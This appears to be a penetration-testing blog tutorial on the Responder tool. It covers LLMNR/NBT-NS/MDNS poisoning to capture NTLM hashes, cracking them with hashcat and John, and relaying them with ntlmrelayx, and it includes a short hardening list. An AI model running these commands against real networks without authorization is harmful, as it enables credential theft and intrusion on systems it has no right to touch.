/ Reconnaissance & Enumeration, Uncategorized / By

Responder: Capturing Credentials Like a Network Bandit

Responder is a powerful LLMNR, NBT-NS, and MDNS poisoner designed for internal network attacks. It listens on a network interface and responds to broadcast name resolution requests, tricking machines into sending authentication attempts to the attacker’s machine — often handing over NTLMv1/v2 hashes or even clear-text creds if misconfigured protocols are present.

If you’re in a Windows environment and nobody changed the defaults, chances are Responder will catch something.

Key Protocols Targeted by Responder

Responder poisons the following by default:

  • LLMNR (Link-Local Multicast Name Resolution)
  • NBT-NS (NetBIOS Name Service)
  • MDNS (Multicast DNS)

When a machine asks the network something like “Who is printserver?” — Responder yells back “That’s me!” and waits for the authentication attempt to come rolling in.

When Should You Use Responder?

Use Responder in:

  • Internal network assessments (especially in flat networks)
  • Environments with Windows machines (where LLMNR/NBT-NS is still enabled)
  • After plugging into a switch port or Wi-Fi network where you’re not isolated
  • VLANs with poorly segmented traffic
  • As part of a man-in-the-middle or credential harvesting operation

Installing Responder

sudo apt update
sudo apt install responder

Or clone from the repo:

git clone https://github.com/SpiderLabs/Responder.git
cd Responder

Basic Usage

Start Responder on a specific interface:

sudo responder -I eth0

Add -v for verbose output:

sudo responder -I eth0 -v

Want to log more than just hashes? Use -w to enable WPAD rogue proxy and capture HTTP traffic:

sudo responder -I eth0 -w -v

Log files are saved in:

Responder/logs/

What You Can Capture

  • NTLMv1/NTLMv2 hashes – Crackable with Hashcat or John.
  • Cleartext credentials – If misconfigured services are running (like HTTP Basic Auth).
  • WPAD credentials – If you enable rogue proxying via WPAD spoofing.

Cracking Captured Hashes

NTLMv2 example with Hashcat:

hashcat -m 5600 responder_hashes.txt rockyou.txt

John the Ripper:

john --format=netntlmv2 responder_hashes.txt --wordlist=rockyou.txt

Bypassing/Hardening Against Responder

From the blue team or sysadmin side:

  • Disable LLMNR and NBT-NS via GPO
  • Use DNS only for name resolution
  • Disable WPAD or configure it securely
  • Isolate devices in separate VLANs
  • Monitor for rogue NBNS or LLMNR responders

Bonus: Use With SMBRelay Attacks

If SMB signing is not enforced, Responder can be paired with tools like MultiRelay.py or ntlmrelayx.py to relay captured hashes and get shell access or dump secrets:

sudo ntlmrelayx.py -tf targets.txt -smb2support

Don’t Forget to Clean Up

To stop Responder:

sudo pkill responder

Or just CTRL+C the running process.

If you modified any network settings (like firewall rules), revert them.

Final Thoughts

Responder is the low-hanging fruit shaker of internal pentesting. If it’s in play and the network is vulnerable, you’ll likely walk away with something. From credential harvesting to relay attacks, it’s a staple tool in every pentester’s toolkit.

TryHackMe Room Recommendation:
Responder — Practice using the tool and see how to catch those juicy NTLMv2 hashes.

Related Posts

Scroll to Top